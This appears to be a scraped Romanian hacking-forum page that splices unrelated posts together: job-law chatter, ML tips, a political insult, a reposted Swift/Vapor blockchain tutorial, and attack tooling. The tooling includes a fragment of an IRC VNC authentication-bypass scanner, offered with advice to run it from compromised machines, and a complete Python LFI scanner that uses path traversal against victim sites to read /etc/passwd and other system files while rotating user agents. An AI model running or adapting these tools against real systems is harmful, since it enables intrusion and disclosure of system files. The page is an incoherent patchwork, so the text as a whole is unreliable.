Leaderboard

Fix o pula. Daca nu ai diploma de bac, nu te poate angaja ca programator, caci la incadrare, trebuie sa specifice codul COR al functiei pe care esti incadrat. Fara diploma de bac, te poate angaja ca portar, necalificat, femeie de servici, etc, plm, insa vei pierde la bani, caci iti va fi impozitat venitul, comparativ cu acelasi venit brut care It-istilor nu le va fi impozitat. (asta daca nu ne mint iar politicienii). in +, nu vei putea trece in cv ca ai lucrat ca programator, x ani, experienta, plm, cand tu ai fost incadrat ca zidar, chiar daca nu ai pus mana pe o caramida, ci ai fost un fel de Brancusi in php si Eminescu al pytonului.

Un Deep Neural Network (Read More) care `invata` sa faca distinctia intre o pisica si un caine. (Cel putin incearca) Link Imagini:

Salut! Presupun ca nu ai alte cunostinte de programare in afara de ce ai mentionat deja, pentru a intelege codu' de mai sus ai putea sa cauti infomatii de baza despre OOP(Object Oriented Programming), clase, obiecte, constructori, metode, encapsulare si eventual sa treci prin niste tutoriale sa te obisnuiesti putin si cu PHP. Legat de proiect, depinde cat de mare vrei sa-l faci si ce vrei sa faci cu el.Oricum,s-ar putea sa ai sau nu nevoie sa te gandesti la urmatoarele: #1. un sistem de useri(inregistrare, logare,implicit sesiune, pagina profil,etc) #1. 1.unde tii informatiile despre useri(nume,parola,mail, credite etc)? folosesti un sistem de login bazat pe facebook/steam etc ? ai nevoie de o baza de date,eventual SQL in care sa tii datele? #2. cum apar creditele? fiecare user primeste un numar pentru inceput si i se aduna/scad cand castiga/pierde pe parcurs? se cumpara cu card/crypto/cartofi? se iau din inventarul unui joc/de pe steam? #3. asta implica putina matematica, in functie de cat de tare vrei sa-i favorizezi pe cei cu numarul de credite mai mare? cum faci sa fie relativ fair sistemul incat sa nu castige mereu cine putin cel mai mult?(asta e optionala, depinde de tine cum vrei sistemu' asta) --de treaba asta ar trebui sa se ocupe un manager de joc aka TicketMaster de mai sus de exemplu #4. cat de "frumos", vizual vorbind vrei sa fie? (implica sa iei datele de la php si sa le aranjezi cu js/css/html) *** Mai sunt si problemele de securitate care pot sa apara in functie de implementare***

Taman aia vroiam sa zic. Muie la pitipoanca aia KGB-ista care afirma ca toate datele populatiei apartin guvernului si ca trebuie monitorizata populatia si plm. Doar sa cauti niscai interviuri mai vechi sa vezi cat de indoctrinata e.

sputniknews.com nu era mecanismul de propaganda a lui Putin si cohorta?

Tensorflow e setat pe GPU. Nu trebuie sa scrii nimic diferit (din cate stiu) sa mearga pe CPU/GPU. Singura diferenta e ca e mai enervant sa instalezi pe GPU din cauza versiunilor de Cuda si Cudnn dar merge mult mai repede (Un alt dezavantaj mare ar fi ca merge doar pe placi Nvidia). Cat despre tutoriale, uita-te pe site-ul lor (link) si/sau pe youtube(Google's machine learning series, sentex's series) si/sau citeste din carti (Nu este neaparat din tensorflow dar este despre machine learning in general: link). Trebuie sa inveti totusi niste matematica sa intelegi ce se intampla si de ce.

Ca sa ti se dea ceva, trebuie sa stii sa ceri.

Am accesat eu camera. Uite ce zice.

In my last post I discussed the basic implementation of Blockchain in Swift language. In this post I will take the Blockchain implementation to the cloud using server side Swift framework, Vapor. We will build the Blockchain Web API over the HTTP protocols, providing necessary functionality using different routes. This post assumes that you have installed Vapor framework on your computer and have basic knowledge of Swift Language. Implementing Models The first step is to create necessary models for the Blockchain Web API. These models will consist of the following. Block: A block class represents a single block which can contain inputs and outputs represented by transactions. class Block : Codable { var index :Int = 0 var dateCreated :String var previousHash :String! var hash :String! var nonce :Int var message :String = "" private (set) var transactions :[Transaction] = [Transaction]() var key :String { get { let transactionsData = try! JSONEncoder().encode(self.transactions) let transactionsJSONString = String(data: transactionsData, encoding: .utf8) return String(self.index) + self.dateCreated + self.previousHash + transactionsJSONString! + String(self.nonce) } } func addTransaction(transaction :Transaction) { self.transactions.append(transaction) } init() { self.dateCreated = Date().toString() self.nonce = 0 self.message = "Mined a New Block" } init(transaction :Transaction) { self.dateCreated = Date().toString() self.nonce = 0 self.addTransaction(transaction: transaction) } } The properties of Block class are explained below: index — The position of block in the blockchain. Index of 0 means that the block is the first block in the blockchain. Index of 1 means it is the second block in the blockchain.. you get the idea right! dateCreated — The date when the block was created previousHash — The hash value of the previous block hash — The current hash of the block message — Memo attached to each block. This is just for our purposes nonce — Auto incremented number which plays an important role for mining the hash transactions — An array of transactions. Each transaction represents a transfer of goods/value key — This is a computed property which is passed to the hashed function Transaction: Transaction consists of the sender, recipient and the amount being transferred. The implementation is shown below: class Transaction :Codable { var from :String var to :String var amount :Double init(from :String, to :String, amount :Double) { self.from = from self.to = to self.amount = amount } init?(request :Request) { guard let from = request.data["from"]?.string, let to = request.data["to"]?.string, let amount = request.data["amount"]?.double else { return nil } self.from = from self.to = to self.amount = amount } } The Transaction class is self explanatory. It consists of from, to and amount fields. For the sake of simplicity we will be using dummy names for from and to fields, in reality these fields will consist of wallet ID. Blockchain: Blockchain is the main class which represents a list of blocks. Each block points back to the previous block in the chain. Each block can contain multiple transactions, representing the credit or debit. class Blockchain : Codable { var blocks :[Block] = [Block]() init() { } init(_ genesisBlock :Block) { self.addBlock(genesisBlock) } func addBlock(_ block :Block) { if self.blocks.isEmpty { // add the genesis block // no previous has was found for the first block block.previousHash = "0" } else { let previousBlock = getPreviousBlock() block.previousHash = previousBlock.hash block.index = self.blocks.count } block.hash = generateHash(for: block) self.blocks.append(block) block.message = "Block added to the Blockchain" } private func getPreviousBlock() -> Block { return self.blocks[self.blocks.count - 1] } private func displayBlock(_ block :Block) { print("------ Block \(block.index) ---------") print("Date Created : \(block.dateCreated) ") //print("Data : \(block.data) ") print("Nonce : \(block.nonce) ") print("Previous Hash : \(block.previousHash!) ") print("Hash : \(block.hash!) ") } private func generateHash(for block: Block) -> String { var hash = block.key.sha256()! // setting the proof of work. // In "00" is good to start since "0000" will take forever and Playground will eventually crash :) while(!hash.hasPrefix(DIFFICULTY)) { block.nonce += 1 hash = block.key.sha256()! print(hash) } return hash } } Each model adheres to the Codable protocol which allows it to easily convert to JSON represented object. If you have followed the last article then the implementation above is very similar. Next step is to configure routes for our Web API, this is implemented in the new section using the Vapor framework. Implementing Web API Using Vapor There are several different ways of implementing the Web API using Vapor. Instead of adding all the code in the Routes class, I proceeded by adding a custom controller which will handle all Blockchain requests. The implementation of BlockchainController is shown below: class BlockchainController { private (set) var drop :Droplet private (set) var blockchainService :BlockchainService! init(drop :Droplet) { self.drop = drop self.blockchainService = BlockchainService() // setup the routes for the controller setupRoutes() } private func setupRoutes() { self.drop.get("mine") { request in let block = Block() self.blockchainService.addBlock(block) return try JSONEncoder().encode(block) } // adding a new transaction self.drop.post("transaction") { request in if let transaction = Transaction(request: request) { // add the transaction to the block // get the last mined block let block = self.blockchainService.getLastBlock() block.addTransaction(transaction: transaction) //let block = Block(transaction: transaction) //self.blockchainService.addBlock(block) return try JSONEncoder().encode(block) } return try JSONEncoder().encode(["message":"Something bad happend!"]) } // get the chain self.drop.get("blockchain") { request in if let blockchain = self.blockchainService.getBlockchain() { return try JSONEncoder().encode(blockchain) } return try! JSONEncoder().encode(["message":"Blockchain is not initialized. Please mine a block"]) } } } We will start by three basic endpoints for the Web API. Mining: This endpoint will initiate the mining proess. Mining will allow us to satisfy the proof of work and add the block to the Blockchain. Transaction: This endpoint is used to add a new transaction. The transaction will contain information about sender, receiver and the amount. Blockchain: This endpoint returns the complete blockchain. The BlockchainController uses the BlockChainService to perform the required operations. The implementation of BlockChainService is shown below: // // BlockchainService.swift // Run // // Created by Mohammad Azam on 12/25/17. // import Foundation import Vapor class BlockchainService { typealias JSONDictionary = [String:String] private var blockchain :Blockchain = Blockchain() init() { } func addBlock(_ block :Block) { self.blockchain.addBlock(block) } func registerNode(_ blockchainNode :BlockchainNode) { self.blockchain.addNode(blockchainNode) } func getLastBlock() -> Block { return self.blockchain.blocks.last! } func getBlockchain() -> Blockchain? { return self.blockchain } } Let’s go ahead and check out out Web API end points. Start the Vapor server and send a request to “mine” end point. Mining a New Block The proof of work algorithm generates a hash value starting with “000”. Once, the block has been mined we return it by converting it into JSON format. This is performed by using the Swift 4.0 Codable Protocols. Now, we can add our transaction to the blockchain. Here is a simple transaction which transfers $10 from Alex to Mary. New Transaction The final step is to check out our blockchain with the newly added block. Visit the endpoint “blockchain” to view the complete chain. Blockchain Hooray! Our Blockchain Web API is now working correctly. Unfortunately, the whole point of blockchain is to be decentralized and currently, we don’t have any mechanism to add new nodes. In the next section we are going to update our blockchain implementation so it can support multiple nodes. Adding Nodes to Blockchain Before allows the blockchain to add new nodes, we must define what a node looks like. The implementation of a node model is shown below: class BlockchainNode :Codable { var address :String init(address :String) { self.address = address } init?(request :Request) { guard let address = request.data["address"]?.string else { return nil } self.address = address } } The BlockChainNode class simply consists of an address property which represents the URL of the node server. We update the BlockchainController to add the ability to register new nodes. This is shown below: self.drop.post("nodes/register") { request in guard let blockchainNode = BlockchainNode(request :request) else { return try JSONEncoder().encode(["message":"Error registering node"]) } self.blockchainService.registerNode(blockchainNode) return try JSONEncoder().encode(blockchainNode) } The BlockchainService also gets updated to accommodate registering of the new nodes. func getNodes() -> [BlockchainNode] { return self.blockchain.nodes } func registerNode(_ blockchainNode :BlockchainNode) { self.blockchain.addNode(blockchainNode) } Let’s go ahead and test it out. Start the new Vapor server and try to register new nodes. Register a New Node Once, the node(s) has been registered, you can fetch it using the nodes end point as shown below: Fetching All Nodes Now, that we can register new nodes we should focus on resolving the conflicts between the nodes. A conflict happens when the blockchain on one node gets larger as compared to the other nodes. In this scenario, we always takes the neighboring nodes and updates them with the larger blockchain. Resolving Conflicts Between Nodes In order to create a conflict we need to run a second server or run the server on a separate port. We are going to use the later approach and start the Vapor server on a different port. Once, the two nodes are initiated, we will create transactions on both nodes which will add blocks to the blockchain. Finally, we will call a resolve end point which will resolve the conflicts between nodes and update the node to the larger blockchain. The BlockchainController has been updated to add a new end point for resolving conflicts. self.drop.get("nodes/resolve") { request in return try Response.async { portal in self.blockchainService.resolve { blockchain in let blockchain = try! JSONEncoder().encode(blockchain) portal.close(with: blockchain.makeResponse()) } } } We have used the async response feature of Vapor framework which will allow us to process the response asyncronously. The BlockchainService has also been updated to support the conflict resolution. The implementation is shown below: func resolve(completion :@escaping (Blockchain) -> ()) { // get the nodes let nodes = self.blockchain.nodes for node in nodes { let url = URL(string :"http://\(node.address)/blockchain")! URLSession.shared.dataTask(with: url) { data, _, _ in if let data = data { let blockchain = try! JSONDecoder().decode(Blockchain.self, from: data) if self.blockchain.blocks.count > blockchain.blocks.count { completion(self.blockchain) } else { self.blockchain.blocks = blockchain.blocks completion(blockchain) } } }.resume() } } The resolve function goes through a list of nodes and fetches the blockchain of each node. If the blockchain is larger than the current blockchain then it replaces the blockchain with the larger one, otherwise it returns the current blockchain which is also the larger one. In order to test it out let’s start two servers on separate port and add two transactions on port 8080 and three on 8090. You can start a Vapor server using terminal by issuing the following command. vapor run serve -— port=8090 We added three transactions on port 8080 node as shown below: Blockchain on Port 8080 After that we added two transactions on port 8090 node as shown below: Blockchain on Port 8090 Make sure to register the node with the 8090 address as shown below: Registering a Node Finally, it is time to test our resolve conflict end point. Invoke the “resolve” end point by visiting it in your Postman as shown below: Resolve End Point Returning Larger Blockchain As you can see the resolve end point returns the larger blockchain and also updates the blockchain for the other nodes. This completes our conflict resolution scenario. [Github] This post is based on an amazing post by Daniel Van Flymen “Learn Blockchains by Building One”. I hope you like the post. I am currently in the process of making a Udemy course on “Blockchain Programming in iOS”. You can subscribe here to get notified when the course is released. If you want to support my writing and donate then please visit my courses page and buy my amazing courses on Udemy. Thanks and happy programming! Source: https://hackernoon.com/building-blockchain-web-api-using-swift-and-vapor-2daf599c8449

scriptul asta e bun de bagat intr-un perl pe un unreal si lasat sa iti faca treaba

82 70 66 32 48 48 51 46 48 48 55 10 - asta e codul ce face bypass RFB **** este eroare de accesare web - la accesarea web e portul 5800 nu 5900 nu am testat scriptul, ti-am dat doar un headsup scriptul initial: ;;;;;;;;;;;;;;;;;;;;;; ;; Exploit Scanners ;; ;;;;;;;;;;;;;;;;;;;;;; ;; VNCAuth Scanner ;; ;;;;;;;;;;;;;;;;;;;;;; on *:join:#:{ /window @scanner $time - [Scanner]-[VNC Server]-[IP: $sock($sockname).ip $+ :5900 ]-[NICK: %vnc-ni ]-[CHAN: %vnc-ch ]-[ 4Not Vulnerable ] sockclose $sockname } } }

~# python scanner.py $$\ $$$$$$$$\ $$$$$$\ $$ | $$ _____|\_$$ _| $$$$$$\ $$ | $$ | $$ | \____$$\ $$ | $$$$$\ $$ | $$$$$$$ |$$ | $$ __| $$ | $$ __$$ |$$ | $$ | $$ | \$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\ \_______|\________|\__| \______| $$$$$$\ $$ __$$\ $$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\ \$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ \____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__| $$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$$\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ | \______/ \_______|\_______|\__| \__|\__| \__| \_______|\__| An0th3r LFI sC4Nn3r v1.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww Usage: scanner.py -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent] Options: -h, --help show this help message and exit -u URL, --url=URL Insert URL: http[s]://www.victim.com -t TARGET, --target=TARGET Insert page: The name of the page to be scanned (Ex. index.php?page=) -p PORT, --port=PORT [Insert Port Number] - Default 80 or 443 --timeout=TIMEOUT [Timeout Value] - Default 10 -r, --random-agent [Set random UserAgent] #!/usr/bin/env python26import optparse import sys import urllib2, socket import random import re # # Banner aLFI banner = """ $$\ $$$$$$$$\ $$$$$$\\ $$ | $$ _____|\_$$ _| $$$$$$\ $$ | $$ | $$ | \____$$\ $$ | $$$$$\ $$ | $$$$$$$ |$$ | $$ __| $$ | $$ __$$ |$$ | $$ | $$ | \$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\\ \_______|\________|\__| \______| $$$$$$\\ $$ __$$\\ $$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\\ \$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\\ \____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__| $$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$$\\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ | \______/ \_______|\_______|\__| \__|\__| \__| \_______|\__| An0th3r LFI sC4Nn3r v1.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n') commandList.add_option('-u', '--url', action="store", dest="url", help="Insert URL: http://www.victim.com", ) commandList.add_option('-t', '--target', action="store", dest="target", help="Insert page: The name of the page to be scanned (Ex. index.php?page=)", ) commandList.add_option('-p', '--port', action="store", dest="port", default=0, type="int", help="[insert Port Number] - Default 80 or 443", ) commandList.add_option('--timeout', action="store", dest="timeout", default=10, type="int", help="[Timeout Value] - Default 10", ) commandList.add_option('-r', '--random-agent', action="store_true", dest="randomagent", default=False, help="[set random UserAgent]", ) options, remainder = commandList.parse_args() # Usage: if ( not options.url or not options.target): print(banner) print commandList.print_help() sys.exit(1) # # UserAgent list # Top UA 18/08/2014 # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] if RANDOMAGENT: UA = random.choice(userAgent) headers = { 'User-Agent' : UA } else: UA = "Python-urllib/%s.%s" % sys.version_info[:2] headers = { 'User-Agent' : UA } return headers # File check list + regexp CHECK = dict() CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$' CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$' CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}{0,5}:[\da-fA-F]{1,4}{0,5}[\da-fA-F]{1,4})' RANDOMAGENT = options.randomagent TIMEOUT = options.timeout URL = options.url PORT = options.port TARGET = options.target if URL[0:8] == "https://": PROTO = URL[0:8] URL = URL[8:] if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 443 elif URL[0:7] == "http://": PROTO = URL[0:7] URL = URL[7:] if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 80 else: PROTO = "http://" URL = options.url if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 80 try: #URL = socket.gethostbyname( URL ) socket.gethostbyname( URL ) except socket.gaierror: #could not resolve print 'Hostname could not be resolved. Exiting' sys.exit() headers = randomAgentGen() print(banner) print print('[*] URL:\t'+PROTO+URL) print('[*] TARGET:\t'+TARGET) print('[*] PORT:\t'+str(PORT)) print found = 0 for fileCheck, fileRegexp in CHECK.items(): FILE = fileCheck REGEXP = fileRegexp checkValidRegexp = re.compile(REGEXP, re.IGNORECASE) for scanLFI in range(1, 11): PATHTRAV = "../" PATHTRAV = PATHTRAV * scanLFI try: req = urllib2.Request(PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE, None, headers) connection = urllib2.urlopen(req, None, TIMEOUT) response = connection.readlines() getcode = connection.getcode() sentinel = 0 for checkResponse in response: #if (getcode == 200 and response != ""): if (getcode == 200 and checkValidRegexp.match(checkResponse)): sentinel = sentinel + 1 if sentinel > 1: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE+'\t <--- FOUND') found = found + 1 else: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE) # HTTP error - 4xx, 5xx except urllib2.HTTPError: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE) # Connection error - Connection refused, No route to host except urllib2.URLError: print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT)) sys.exit() if found < 1: print print('[+] Nothing found') Source